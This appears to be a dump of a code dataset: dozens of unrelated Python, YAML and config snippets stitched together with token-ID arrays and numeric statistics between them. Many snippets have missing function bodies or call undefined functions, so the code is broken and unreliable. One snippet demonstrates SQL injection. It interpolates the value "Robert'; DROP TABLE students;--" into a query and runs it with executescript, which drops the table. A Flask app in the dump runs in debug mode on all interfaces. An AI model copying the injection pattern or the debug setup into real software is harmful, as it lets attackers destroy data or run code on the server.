from sqlalchemy.orm import class_mapper
from sqlalchemy import or_, and_, ForeignKey
from sqlalchemy import func
from flask.ext.compress import Compress
from flask.ext.assets import Environment, Bundle
from subprocess import Popen,PIPE
import argparse
import os.path
import collections
admin = Blueprint('admin', __name__, static_folder='static', url_prefix='/')
db = SQLAlchemy()
@admin.route('/')
@admin.route('getbubbleplot')
@admin.route('getbarplot')
@admin.route('getplot/<plot_type>')
@admin.route('getbubbleinfo')
@admin.route('getdiffinfo')
@admin.route('getbubblealignments/<x>/<y>')
@admin.route('getdiffalignments/<diff>')
@admin.route('set_comparison/<comp>')
if __name__== '__main__':
parser = argparse.ArgumentParser(description='Web server to compare STR calls and their associated alignments')
parser.add_argument("--bams", type=str, required=True, help='Comma-separated list of bam files')
parser.add_argument("--bais", type=str, required=True, help='Comma-separated list of bam index files. Order must match that of the --bams arguments')
parser.add_argument("--fasta", type=str, required=True, help='Directory containing chromosome fasta files')
parser.add_argument("--vizalign", type=str, required=True, help='Full path for vizalign executable')
args = parser.parse_args()
# Create app
my_app = create_app(args.bams, args.bais, args.fasta, args.vizalign)
# Run it
my_app.run(host='0.0.0.0', port=6015, debug=True)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
13,
22,
198,
198,
6738,
42903,
1330,
46947,
11,
19016,
62,
1640,
11,
787,
62,
26209,
11,
8543,
62,
28243,
11,
2581,
198,
6738,
42903,
1330,
33918,
11,
33918,
1958,
11,
1459,
62,
1324,... | 2.936877 | 602 |
#program to check whether a file exists.
import os.path
print(main('C:/Users/pc/Desktop/Python Task Solutions/Uche Clare/Phase 1/Python Basic 1/Day-5/Task 31', 'py' ))
| [
2,
23065,
284,
2198,
1771,
257,
2393,
7160,
13,
198,
11748,
28686,
13,
6978,
198,
4798,
7,
12417,
10786,
34,
14079,
14490,
14,
14751,
14,
36881,
14,
37906,
15941,
23555,
14,
52,
2395,
22736,
14,
35645,
352,
14,
37906,
14392,
352,
14,
... | 2.965517 | 58 |
def series(n, bool=False):
"""
:param bool: If bool=True, then the function will return the boolean list of the prime numbers.
If bool=False, then the function will return the list of prime number less than n+1.
:param n: Prime Number less than n.
:return: returns None if n is 0 or 1 otherwise returns the list of prime numbers less than n.
"""
# If n is less than 2, return None because no prime number is less than 2.
if n<2:
return None
prime = [True]*(n+1)
p = 2
while (p * p <= n):
# If prime[p] is not changed, then it is a prime
if (prime[p] == True):
# Update all multiples of p
for i in range(p * 2, n+1, p):
prime[i] = False
p += 1
if bool:
return prime
else:
list_ = []
for i in range(2, n+1):
if prime[i]:
list_.append(i)
return list_
if __name__ == '__main__':
main() | [
198,
4299,
2168,
7,
77,
11,
20512,
28,
25101,
2599,
220,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1058,
17143,
20512,
25,
1002,
20512,
28,
17821,
11,
788,
262,
2163,
481,
1441,
262,
25131,
1351,
286,
262,
6994,
3146,
13,
198,
... | 2.156448 | 473 |
from Test import Test, Test as test
'''
Build Tower
Build Tower by the following given argument:
number of floors (integer and always greater than 0).
Tower block is represented as *
for example, a tower of 3 floors looks like below
[
' * ',
' *** ',
'*****'
]
and a tower of 6 floors looks like below
[
' * ',
' *** ',
' ***** ',
' ******* ',
' ********* ',
'***********'
]
'''
# Initial
# Condensed
test.describe("Tests")
test.it("Basic Tests")
test.assert_equals(tower_builder(1), ['*', ])
test.assert_equals(tower_builder(2), [' * ', '***'])
test.assert_equals(tower_builder(3), [' * ', ' *** ', '*****'])
| [
6738,
6208,
1330,
6208,
11,
6208,
355,
1332,
198,
198,
7061,
6,
198,
15580,
8765,
198,
15580,
8765,
416,
262,
1708,
1813,
4578,
25,
198,
17618,
286,
18570,
357,
41433,
290,
1464,
3744,
621,
657,
737,
198,
198,
51,
789,
2512,
318,
79... | 2.680162 | 247 |
import logging
import os
import editdistance
import matplotlib.pyplot as plt
from DataLoaderIAM import Batch
from Model import Model
from SamplePreprocessor import word_image_preprocess, image_preprocess
from spelling_correction import SpellingCorrector
from translator import Translator, google_translate
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
def infer_line(model, images_lst):
"""recognize text in image provided by file path"""
recognized_words = []
for img in images_lst:
img = word_image_preprocess(img, Model.lineImgSize)
batch = Batch(None, [img])
(recognized, _) = model.inferBatch(batch)
recognized_words.append(recognized[0])
recognized_line = ' '.join(w for w in recognized_words)
return SpellingCorrector().get_correct(recognized_line)
def infer_batch(model, batch):
"""recognize text in image provided by file path"""
recognized_lines = [infer_line(model, lst) for lst in batch.imgs]
return recognized_lines
def validate_lines(model, loader):
"""validate NN"""
print('Validate NN')
loader.validationSet()
numCharErr = 0
numCharTotal = 0
numLinesOK = 0
numLinesTotal = 0
while loader.hasNext():
iterInfo = loader.getIteratorInfo()
print(f'Batch: {iterInfo[0]} / {iterInfo[1]}')
batch = loader.getNext()
recognized = infer_batch(model, batch)
print('Ground truth -> Recognized')
for i in range(len(recognized)):
numLinesOK += 1 if batch.gtTexts[i] == recognized[i] else 0
numLinesTotal += 1
dist = editdistance.eval(recognized[i], batch.gtTexts[i])
numCharErr += dist
numCharTotal += len(batch.gtTexts[i])
print('[OK]' if dist == 0 else '[ERR:%d]' % dist, '"' + batch.gtTexts[i] + '"', '->',
'"' + recognized[i] + '"')
# print validation result
charErrorRate = numCharErr / numCharTotal
wordAccuracy = numLinesOK / numLinesTotal
print(f'Character error rate: {charErrorRate * 100.0}%. Word accuracy: {wordAccuracy * 100.0}%.')
return charErrorRate, wordAccuracy
def main():
"""main function"""
model = Model(mustRestore=True, is_line=True)
res = image_preprocess('../data/lines/3.png', is_lines=True)
for (j, w) in enumerate(res):
plt.imshow(w, cmap='gray')
plt.show()
pred_line = infer_line(model, res)
translator = Translator()
print(f'\n\n\nPredicted line: \t {pred_line}')
print('Our translator: \t', translator.translate(pred_line))
print('Google translator: \t', google_translate(pred_line))
if __name__ == '__main__':
main()
| [
11748,
18931,
198,
11748,
28686,
198,
198,
11748,
4370,
30246,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
6738,
6060,
17401,
40,
2390,
1330,
347,
963,
198,
6738,
9104,
1330,
9104,
198,
6738,
27565,
6719,
413... | 2.522581 | 1,085 |
# See LICENSE file for full copyright and licensing details.
{
'name': 'HOSTEL',
'version': "12.0.1.0.0",
'author': 'Serpent Consulting Services Pvt. Ltd.',
'category': 'School Management',
'website': 'http://www.serpentcs.com',
'license': "AGPL-3",
'complexity': 'easy',
'summary': 'Module For HOSTEL Management In School',
'depends': ['school', 'account'],
'images': ['static/description/SchoolHostel.png'],
'data': ['security/hostel_security.xml',
'security/ir.model.access.csv',
'views/hostel_view.xml',
'views/hostel_sequence.xml',
'views/report_view.xml',
'views/hostel_fee_receipt.xml',
'data/hostel_schedular.xml',
'wizard/terminate_reason_view.xml'],
'demo': ['demo/school_hostel_demo.xml'],
'installable': True,
'auto_install': False
}
| [
2,
4091,
38559,
24290,
2393,
329,
1336,
6634,
290,
15665,
3307,
13,
198,
198,
90,
198,
220,
220,
220,
705,
3672,
10354,
705,
39,
10892,
3698,
3256,
198,
220,
220,
220,
705,
9641,
10354,
366,
1065,
13,
15,
13,
16,
13,
15,
13,
15,
... | 2.223881 | 402 |
# Copyright 2006 James Tauber and contributors
# Copyright (C) 2009 Luke Kenneth Casson Leighton <lkcl@lkcl.net>
# Copyright (C) 2012 Robert Peters <robertpeters@winterlionsoftware.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyjamas import DOM
from pyjamas import Factory
from __pyjamas__ import console
from sets import Set
import pygwt
from pyjamas.ui.Widget import Widget
from pyjamas.ui import Event
from pyjamas.ui import Focus
from pyjamas.ui.TreeItem import RootTreeItem, TreeItem
from pyjamas.ui import MouseListener
from pyjamas.ui import KeyboardListener
from pyjamas.ui import FocusListener
Factory.registerClass('pyjamas.ui.Tree', 'Tree', Tree)
| [
2,
15069,
4793,
3700,
36849,
527,
290,
20420,
198,
2,
15069,
357,
34,
8,
3717,
11336,
23632,
14154,
261,
1004,
42993,
1279,
75,
74,
565,
31,
75,
74,
565,
13,
3262,
29,
198,
2,
15069,
357,
34,
8,
2321,
5199,
15722,
1279,
305,
4835,... | 3.56231 | 329 |
from typing import Any, Dict
from boto3 import Session
from app import Remediation
from app.remediation_base import RemediationBase
@Remediation
class AwsRdsEnableAutoMinorVersionUpgrade(RemediationBase):
"""Remediation that enables Auto Minor Version upgrade for RDS instances"""
@classmethod
@classmethod
@classmethod
| [
6738,
19720,
1330,
4377,
11,
360,
713,
198,
198,
6738,
275,
2069,
18,
1330,
23575,
198,
198,
6738,
598,
1330,
3982,
276,
3920,
198,
6738,
598,
13,
260,
2379,
341,
62,
8692,
1330,
3982,
276,
3920,
14881,
628,
198,
31,
8413,
276,
3920... | 3.39604 | 101 |
"""Constants. Most are physical, except for alphabet"""
import numpy as np
G = 6.674e-11 # N*m^2/kg^2
h = 6.6261e-34 # J*s
epsilon_0 = 8.854e-12 # F/m
mu_0 = 1.257e-6 # H/m
c = 2.99792e8 # m/s
sigma = 5.6704e-8 # W/m^2/K^4
hbar = 1.05457e-34 # J*s
k = 8.98755e9 # Nm^2/C^2
tau = 2 * np.pi
kb = 1.380648e-23
alphabet = ("ABCDEFHGIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 `~!"
"@#$%^&*()-_+={}[]|\\:'\"<,>.?/")
m_earth = 5.9722e24
m_sun = 1.989e30
| [
37811,
34184,
1187,
13,
4042,
389,
3518,
11,
2845,
329,
24830,
37811,
198,
198,
11748,
299,
32152,
355,
45941,
198,
198,
38,
796,
718,
13,
45385,
68,
12,
1157,
220,
1303,
399,
9,
76,
61,
17,
14,
10025,
61,
17,
198,
71,
796,
718,
... | 1.717857 | 280 |
from robot import robot
from robotAI import robotAI
from simulator import *
from harry_plotter import harry_plotter
if __name__ == "__main__":
main()
| [
6738,
9379,
1330,
9379,
198,
6738,
9379,
20185,
1330,
9379,
20185,
198,
6738,
35375,
1330,
1635,
198,
6738,
3971,
563,
62,
29487,
353,
1330,
3971,
563,
62,
29487,
353,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
... | 3.229167 | 48 |
# -*- coding: utf-8 -*-
# import from apps here
# import from lib
# ===============================================================================
from django.contrib import admin
from homework.models import TaskLog, TaskResult, CapacityData2
admin.site.register(CapacityData2)
# admin.site.register(TaskResult)
# admin.site.register(TaskLog)
# ===============================================================================
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
1330,
422,
6725,
994,
628,
198,
2,
1330,
422,
9195,
198,
2,
38093,
25609,
855,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
26131,
13,
27530... | 4.489583 | 96 |
rbac = """
---
apiVersion: agilicus.com/v1
kind: RbacRole
metadata:
name: {cfg[name]}-{cfg[downstream_base_host]}-whitelist
spec:
name: '*'
rules:
- host: {cfg[downstream_base_host]}.__ROOT_DOMAIN__
path: "^/.*"
method: "*"
"""
| [
26145,
330,
796,
37227,
198,
6329,
198,
15042,
14815,
25,
556,
346,
24552,
13,
785,
14,
85,
16,
198,
11031,
25,
371,
65,
330,
47445,
198,
38993,
25,
198,
220,
1438,
25,
1391,
37581,
58,
3672,
48999,
12,
90,
37581,
58,
2902,
5532,
... | 2.118644 | 118 |
import FWCore.ParameterSet.Config as cms
import math
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
OuterTrackerMonitorTTCluster = DQMEDAnalyzer('OuterTrackerMonitorTTCluster',
TopFolderName = cms.string('SiOuterTracker'),
TTClusters = cms.InputTag("TTClustersFromPhase2TrackerDigis", "ClusterInclusive"),
# Number of clusters per layer
TH1TTCluster_Barrel = cms.PSet(
Nbinsx = cms.int32(7),
xmax = cms.double(7.5),
xmin = cms.double(0.5)
),
# Number of clusters per disc
TH1TTCluster_ECDiscs = cms.PSet(
Nbinsx = cms.int32(6),
xmax = cms.double(6.5),
xmin = cms.double(0.5)
),
# Number of clusters per EC ring
TH1TTCluster_ECRings = cms.PSet(
Nbinsx = cms.int32(16),
xmin = cms.double(0.5),
xmax = cms.double(16.5)
),
# Cluster eta distribution
TH1TTCluster_Eta = cms.PSet(
Nbinsx = cms.int32(45),
xmax = cms.double(5.0),
xmin = cms.double(-5.0)
),
# Cluster phi distribution
TH1TTCluster_Phi = cms.PSet(
Nbinsx = cms.int32(60),
xmax = cms.double(math.pi),
xmin = cms.double(-math.pi)
),
# Cluster R distribution
TH1TTCluster_R = cms.PSet(
Nbinsx = cms.int32(45),
xmax = cms.double(120),
xmin = cms.double(0)
),
# Cluster Width vs. I/O sensor
TH2TTCluster_Width = cms.PSet(
Nbinsx = cms.int32(7),
xmax = cms.double(6.5),
xmin = cms.double(-0.5),
Nbinsy = cms.int32(2),
ymax = cms.double(1.5),
ymin = cms.double(-0.5)
),
# TTCluster forward/backward endcap y vs x
TH2TTCluster_Position = cms.PSet(
Nbinsx = cms.int32(960),
xmax = cms.double(120),
xmin = cms.double(-120),
Nbinsy = cms.int32(960),
ymax = cms.double(120),
ymin = cms.double(-120)
),
#TTCluster #rho vs z
TH2TTCluster_RZ = cms.PSet(
Nbinsx = cms.int32(900),
xmax = cms.double(300),
xmin = cms.double(-300),
Nbinsy = cms.int32(900),
ymax = cms.double(120),
ymin = cms.double(0)
),
)
| [
11748,
48849,
14055,
13,
36301,
7248,
13,
16934,
355,
269,
907,
198,
11748,
10688,
198,
198,
6738,
360,
48,
5653,
712,
1063,
13,
14055,
13,
35,
48,
30733,
37702,
9107,
1330,
360,
48,
30733,
37702,
9107,
198,
7975,
263,
35694,
35479,
1... | 1.877375 | 1,158 |
"""The osramlightify component."""
| [
37811,
464,
28686,
859,
2971,
1958,
7515,
526,
15931,
198
] | 3.5 | 10 |
import logging
import logging.config
import os
import socket
from trollius import SSLContext
import app as app
from worker import ansible_queue
# from workers.ansible_worker.ansible_server import AnsibleServer
from ansible_server import AnsibleServer
from util.log import logfile_path
from raven.handlers.logging import SentryHandler
from raven.conf import setup_logging
logger = logging.getLogger(__name__)
DEFAULT_WEBSOCKET_PORT = 8788
DEFAULT_CONTROLLER_PORT = 8688
if __name__ == "__main__":
logging_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {"format": "%(asctime)s [%(levelname)s] %(name)s: %(message)s"},
},
"handlers": {
"default": {
"level": "DEBUG", #'INFO',
"formatter": "standard",
"class": "logging.StreamHandler",
},
},
"loggers": {
"": {"handlers": ["default"], "level": "DEBUG", "propagate": True} #'INFO',
},
}
logging.config.dictConfig(logging_config)
run_ansible_manager()
| [
11748,
18931,
198,
11748,
18931,
13,
11250,
198,
11748,
28686,
198,
11748,
17802,
198,
198,
6738,
13278,
3754,
1330,
25952,
21947,
198,
11748,
598,
355,
598,
198,
6738,
8383,
1330,
9093,
856,
62,
36560,
198,
198,
2,
422,
3259,
13,
504,
... | 2.341667 | 480 |
# # Example
#
# The following example demonstrates how to the use the `pymatch` package to match [Lending Club Loan Data](https://www.kaggle.com/wendykan/lending-club-loan-data). Follow the link to download the dataset from Kaggle (you'll have to create an account, it's fast and free!).
#
# Here we match Lending Club users that fully paid off loans (control) to those that defaulted (test). The example is contrived, however a use case for this could be that we want to analyze user sentiment with the platform. Users that default on loans may have worse sentiment because they are predisposed to a bad situation--influencing their perception of the product. Before analyzing sentiment, we can match users that paid their loans in full to users that defaulted based on the characteristics we can observe. If matching is successful, we could then make a statetment about the **causal effect** defaulting has on sentiment if we are confident our samples are sufficiently balanced and our model is free from omitted variable bias.
#
# This example, however, only goes through the matching procedure, which can be broken down into the following steps:
#
# * [Data Preparation](#Data-Prep)
# * [Fit Propensity Score Models](#Matcher)
# * [Predict Propensity Scores](#Predict-Scores)
# * [Tune Threshold](#Tune-Threshold)
# * [Match Data](#Match-Data)
# * [Assess Matches](#Assess-Matches)
#
# ----
# ### Data Prep
import warnings
warnings.filterwarnings("ignore")
from pymatch import Matcher
import pandas as pd
import numpy as np
# Load the dataset (`loan.csv`) and select a subset of columns.
#
# Create test and control groups and reassign `loan_status` to be a binary treatment indicator. This is our reponse in the logistic regression model(s) used to generate propensity scores.
data = pd.read_csv("./example_files/loan_sample.csv")
print(data.head())
test = data[data['loan_status'] == 1]
control = data[data['loan_status'] == 0]
# ----
#
# ### `Matcher`
# Initalize the `Matcher` object.
#
# **Note that:**
#
# * Upon intialization, `Matcher` prints the formula used to fit logistic regression model(s) and the number of records in the majority/minority class.
# * The regression model(s) are used to generate propensity scores. In this case, we are using the covariates on the right side of the equation to estimate the probability of defaulting on a loan (`loan_status`= 1).
# * `Matcher` will use all covariates in the dataset unless a formula is specified by the user. Note that this step is only fitting model(s), we assign propensity scores later.
# * Any covariates passed to the (optional) `exclude` parameter will be ignored from the model fitting process. This parameter is particularly useful for unique identifiers like a `user_id`.
m = Matcher(test, control, yvar="loan_status", exclude=[])
# There is a significant imbalance in our data--the majority group (fully-paid loans) having many more records than the minority group (defaulted loans). We account for this by setting `balance=True` when calling `Matcher.fit_scores()` below. This tells `Matcher` to sample from the majority group when fitting the logistic regression model(s) so that the groups are of equal size. When undersampling this way, it is highly recommended that `nmodels` is explictly assigned to a integer much larger than 1. This ensure is that more of the majority group is contributing to the generation of propensity scores. The value of this integer should depend on the severity of the imbalance; here we use `nmodels`=100.
# for reproducibility
np.random.seed(20170925)
m.fit_scores(balance=True, nmodels=10)
# The average accuracy of our 100 models is 70.21%, suggesting that there's separability within our data and justifiying the need for the matching procedure. It's worth noting that we don't pay much attention to these logistic models since we are using them as a feature extraction tool (generation of propensity scores). The accuracy is a good way to detect separability at a glance, but we shouldn't spend time tuning and tinkering with these models. If our accuracy was close to 50%, that would suggest we cannot detect much separability in our groups given the features we observe and that matching is probably not necessary (or more features should be included if possible).
# ### Predict Scores
m.predict_scores()
m.plot_scores()
exit()
# The plot above demonstrates the separability present in our data. Test profiles have a much higher **propensity**, or estimated probability of defaulting given the features we isolated in the data.
# ---
#
# ### Tune Threshold
# The `Matcher.match()` method matches profiles that have propensity scores within some threshold.
#
# i.e. for two scores `s1` and `s2`, `|s1 - s2|` <= `threshold`
#
# By default matches are found *from* the majority group *for* the minority group. For example, if our test group contains 1,000 records and our control group contains 20,000, `Matcher` will
# iterate through the test (minority) group and find suitable matches from the control (majority) group. If a record in the minority group has no suitable matches, it is dropped from the final matched dataset. We need to ensure our threshold is small enough such that we get close matches and retain most (or all) of our data in the minority group.
#
# Below we tune the threshold using `method="random"`. This matches a random profile that is within the threshold
# as there could be many. This is much faster than the alternative method "min", which finds the *closest* match for every minority record.
m.tune_threshold(method="random")
# It looks like a threshold of 0.0001 retains 100% of our data. Let's proceed with matching using this threshold.
# ---
#
# ### Match Data
# Below we match one record from the majority group to each record in the minority group. This is done **with** replacement, meaning a single majority record can be matched to multiple minority records. `Matcher` assigns a unique `record_id` to each record in the test and control groups so this can be addressed after matching. If susequent modelling is planned, one might consider weighting models using a weight vector of 1/`f` for each record, `f` being a record's frequency in the matched dataset. Thankfully `Matcher` can handle all of this for you :).
m.match(method="min", nmatches=1, threshold=0.0001)
m.record_frequency()
# It looks like the bulk of our matched-majority-group records occur only once, 68 occur twice, ... etc. We can preemptively generate a weight vector using `Matcher.assign_weight_vector()`
m.assign_weight_vector()
# Let's take a look at our matched data thus far. Note that in addition to the weight vector, `Matcher` has also assigned a `match_id` to each record indicating our (in this cased) *paired* matches since we use `nmatches=1`. We can verify that matched records have `scores` within 0.0001 of each other.
m.matched_data.sort_values("match_id").head(6)
# ---
#
# ### Assess Matches
# We must now determine if our data is "balanced". Can we detect any statistical differences between the covariates of our matched test and control groups? `Matcher` is configured to treat categorical and continouous variables separately in this assessment.
# ___Discrete___
#
# For categorical variables, we look at plots comparing the proportional differences between test and control before and after matching.
#
# For example, the first plot shows:
# * `prop_test` - `prop_control` for all possible `term` values---`prop_test` and `prop_control` being the proportion of test and control records with a given term value, respectively. We want these (orange) bars to be small after matching.
# * Results (pvalue) of a Chi-Square Test for Independence before and after matching. After matching we want this pvalue to be > 0.05, resulting in our failure to reject the null hypothesis that the frequecy of the enumerated term values are independent of our test and control groups.
categorical_results = m.compare_categorical(return_table=True)
categorical_results
# Looking at the plots and test results, we did a pretty good job balancing our categorical features! The p-values from the Chi-Square tests are all > 0.05 and we can verify by observing the small proportional differences in the plots.
#
# ___Continuous___
#
# For continous variables we look at Empirical Cumulative Distribution Functions (ECDF) for our test and control groups before and after matching.
#
# For example, the first plot pair shows:
# * ECDF for test vs ECDF for control before matching (left), ECDF for test vs ECDF for control after matching(right). We want the two lines to be very close to each other (or indistiguishable) after matching.
# * Some tests + metrics are included in the chart titles.
# * Tests performed:
# * Kolmogorov-Smirnov Goodness of fit Test (KS-test)
# This test statistic is calculated on 1000
# permuted samples of the data, generating
# an imperical p-value. See pymatch.functions.ks_boot()
# This is an adaptation of the ks.boot() method in
# the R "Matching" package
# https://www.rdocumentation.org/packages/Matching/versions/4.9-2/topics/ks.boot
# * Chi-Square Distance:
# Similarly this distance metric is calculated on
# 1000 permuted samples.
# See pymatch.functions.grouped_permutation_test()
#
# * Other included Stats:
# * Standarized mean and median differences.
# How many standard deviations away are the mean/median
# between our groups before and after matching
# i.e. `abs(mean(control) - mean(test))` / `std(control.union(test))`
cc = m.compare_continuous(return_table=True)
cc
# We want the pvalues from both the KS-test and the grouped permutation of the Chi-Square distance after matching to be > 0.05, and they all are! We can verify by looking at how close the ECDFs are between test and control.
#
# # Conclusion
# We saw a very "clean" result from the above procedure, achieving balance among all the covariates. In my work at Mozilla, we see much hairier results using the same procedure, which will likely be your experience too. In the case that certain covariates are not well balanced, one might consider tinkering with the parameters of the matching process (`nmatches`>1) or adding more covariates to the formula specified when we initialized the `Matcher` object.
# In any case, in subsequent modelling, you can always control for variables that you haven't deemed "balanced".
| [
198,
2,
1303,
17934,
198,
2,
198,
2,
383,
1708,
1672,
15687,
703,
284,
262,
779,
262,
4600,
79,
4948,
963,
63,
5301,
284,
2872,
685,
43,
1571,
6289,
32314,
6060,
16151,
5450,
1378,
2503,
13,
74,
9460,
293,
13,
785,
14,
86,
437,
... | 3.716188 | 2,854 |
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
# Route Helpers
# Core Views | [
6738,
42625,
14208,
13,
7295,
13,
6371,
411,
349,
690,
1330,
9575,
198,
6738,
42625,
14208,
13,
9288,
1330,
20985,
11,
6208,
20448,
628,
220,
220,
220,
1303,
18956,
10478,
364,
628,
220,
220,
220,
1303,
7231,
29978
] | 3.263158 | 38 |
import contextlib
import sublime
from live.settings import setting
from live.shared.backend import interacts_with_backend
from live.shared.cursor import Cursor
from live.sublime.edit import edit_for
from live.sublime.edit import edits_self_view
from live.sublime.misc import add_hidden_regions
from live.sublime.misc import read_only_set_to
from live.sublime.region_edit import RegionEditHelper
from live.sublime.selection import set_selection
from live.ws_handler import ws_handler
class UserInputOutputInfo:
"""Helper class that knows where are prompt regions and result regions in a REPL"""
@property
| [
11748,
4732,
8019,
198,
11748,
41674,
198,
198,
6738,
2107,
13,
33692,
1330,
4634,
198,
6738,
2107,
13,
28710,
13,
1891,
437,
1330,
44020,
62,
4480,
62,
1891,
437,
198,
6738,
2107,
13,
28710,
13,
66,
21471,
1330,
327,
21471,
198,
6738... | 3.608187 | 171 |
from torch import nn
from sklearn.metrics import accuracy_score
import pandas as pd
from torch.utils.data import DataLoader, Dataset
from tqdm import tqdm
from utils import fix_seed
import torch
from transformers import BertTokenizer
from torch import softmax
path = 'E:\\ptm\\roberta'
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
tokenizer = BertTokenizer.from_pretrained(path)
# 准备我们需要用到的参数和layer
# 前向传播,那我们准备好的layer拼接在一起
# 训练模型
if __name__ == '__main__':
train()
| [
6738,
28034,
1330,
299,
77,
198,
6738,
1341,
35720,
13,
4164,
10466,
1330,
9922,
62,
26675,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
6060,
17401,
11,
16092,
292,
316,
198,
6738,
256,
80,
36020... | 2.191667 | 240 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ## ###############################################################
# selectionsort.py
#
# Author: Mauricio Matamoros
# License: MIT
#
# ## ###############################################################
from comparesort.array import Array
def selectionsort(array):
"""Sorts the provided Array object using the Selection Sort algorithm"""
if isinstance(array, list):
array = Array(array) # Converts the list to an Array
if not isinstance(array, Array):
raise TypeError("Expected a list or Array object")
# Selection Sort Algorithm
for i in range(len(array)):
# Find smallest unsorted element in Array:
ix_min = i
for j in range(i+1, len(array)):
if array[ix_min] > array[j]:
ix_min = j
# Swap the smallest element found with the firs element of the
# unsorted sub-array
array.swap(i, ix_min)
#end for
#end def
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
22492,
1303,
29113,
14468,
7804,
4242,
2235,
198,
2,
28224,
419,
13,
9078,
198,
2,
198,
2,
6434,
25,
18867,
... | 3.156028 | 282 |
#!/usr/bin/python3
import sqlite3
db = "./students.db"
conn = sqlite3.connect(db)
c = conn.cursor()
print("Without Hack: \n")
c.execute("SELECT * from students WHERE Name='Robert'")
result = c.fetchall()
print(result)
print("With Hack: \n")
Name = "Robert'; DROP TABLE students;--"
print("SELECT * from students WHERE Name='%s'" % Name)
c.executescript("SELECT * from students WHERE Name='%s'" % Name)
result = c.fetchall()
print(result)
conn.close() | [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
11748,
44161,
578,
18,
198,
198,
9945,
796,
366,
19571,
19149,
658,
13,
9945,
1,
198,
37043,
796,
44161,
578,
18,
13,
8443,
7,
9945,
8,
198,
66,
796,
48260,
13,
66,
21471,
3419,
198,
... | 2.797546 | 163 |
from typing import Counter, List
from Game.server_functions import Parser, RoundManager
import random
from fastapi import FastAPI, WebSocket, WebSocketDisconnect
from fastapi.responses import HTMLResponse
from fastapi.staticfiles import StaticFiles
import asyncio
import re
app = FastAPI()
input_parser = Parser()
round_manager = RoundManager(1)
# app.mount("/static", StaticFiles(directory="static"), name="static")
cache = []
current_check = None
statement_order = []
manager = ConnectionManager()
scores = {}
random_statement = []
@app.get("/test")
@app.websocket("/ws/{client_id}")
import uvicorn
if __name__ == '__main__':
uvicorn.run('main:app', host="127.0.0.1", port = 8001, log_level = "info")
| [
6738,
19720,
1330,
15034,
11,
7343,
198,
6738,
3776,
13,
15388,
62,
12543,
2733,
1330,
23042,
263,
11,
10485,
13511,
198,
11748,
4738,
198,
198,
6738,
3049,
15042,
1330,
12549,
17614,
11,
5313,
39105,
11,
5313,
39105,
7279,
8443,
198,
6... | 3.139738 | 229 |
from __future__ import annotations
__all__ = ["run", "main"]
import os
import sys
import io
import argparse
from typing import Optional
from gada import component, runners, datadir
def split_unknown_args(argv: list[str]) -> tuple[list[str], list[str]]:
"""Separate known command-line arguments from unknown one.
Unknown arguments are separated from known arguments by
the special **--** argument.
:param argv: command-line arguments
:return: tuple (known_args, unknown_args)
"""
for i in range(len(argv)):
if argv[i] == "--":
return argv[:i], argv[i + 1 :]
return argv, []
def run(
node: str,
argv: Optional[list[str]] = None,
*,
stdin=None,
stdout=None,
stderr=None,
):
"""Run a gada node:
.. code-block:: python
>>> import gada
>>>
>>> # Overwrite "gada/test/testnodes/config.yml" for this test
>>> gada.test_utils.write_testnodes_config({
... 'nodes': {
... 'echo': {
... 'runner': 'generic',
... 'bin': 'echo'
... }
... }
... })
>>>
>>> # Need to create fake stdin and stdout for unittests
>>> with gada.test_utils.PipeStream() as stdin:
... with gada.test_utils.PipeStream() as stdout:
... # Run node with CLI arguments
... gada.run(
... 'testnodes.echo',
... ['hello'],
... stdin=stdin.reader,
... stdout=stdout.writer,
... stderr=stdout.writer
... )
...
... # Close writer end so we can read form it
... stdout.writer.close()
...
... # Read node output
... stdout.reader.read().decode().strip()
'hello'
>>>
The three parameters ``stdin``, ``stdout`` or ``stderr`` are provided as a convenience
for writing unit tests when you can't use ``sys.stdin`` or ``sys.stdout``, or simply
when you want to be able to read from the output.
:param node: node to run
:param argv: additional CLI arguments
:param stdin: input stream
:param stdout: output stream
:param stderr: error stream
"""
# Load gada configuration
gada_config = datadir.load_config()
# Check command format
node_argv = node.split(".")
if len(node_argv) != 2:
raise Exception(f"invalid command {node}")
# Load component module
comp = component.load(node_argv[0])
# Load node configuration
node_config = component.get_node_config(component.load_config(comp), node_argv[1])
# Load correct runner
runner = runners.load(node_config.get("runner", None))
# Run component
runner.run(
comp=comp,
gada_config=gada_config,
node_config=node_config,
argv=argv,
stdin=stdin,
stdout=stdout,
stderr=stderr,
)
def main(
argv: Optional[list[str]] = None,
*,
stdin=None,
stdout=None,
stderr=None,
):
"""Gada main:
.. code-block:: python
>>> import gada
>>>
>>> # Overwrite "gada/test/testnodes/config.yml" for this test
>>> gada.test_utils.write_testnodes_config({
... 'nodes': {
... 'echo': {
... 'runner': 'generic',
... 'bin': 'echo'
... }
... }
... })
>>>
>>> # Need to create fake stdin and stdout for unittests
>>> with gada.test_utils.PipeStream() as stdin:
... with gada.test_utils.PipeStream() as stdout:
... # Run node with CLI arguments
... gada.main(
... ['gada', 'testnodes.echo', 'hello'],
... stdin=stdin.reader,
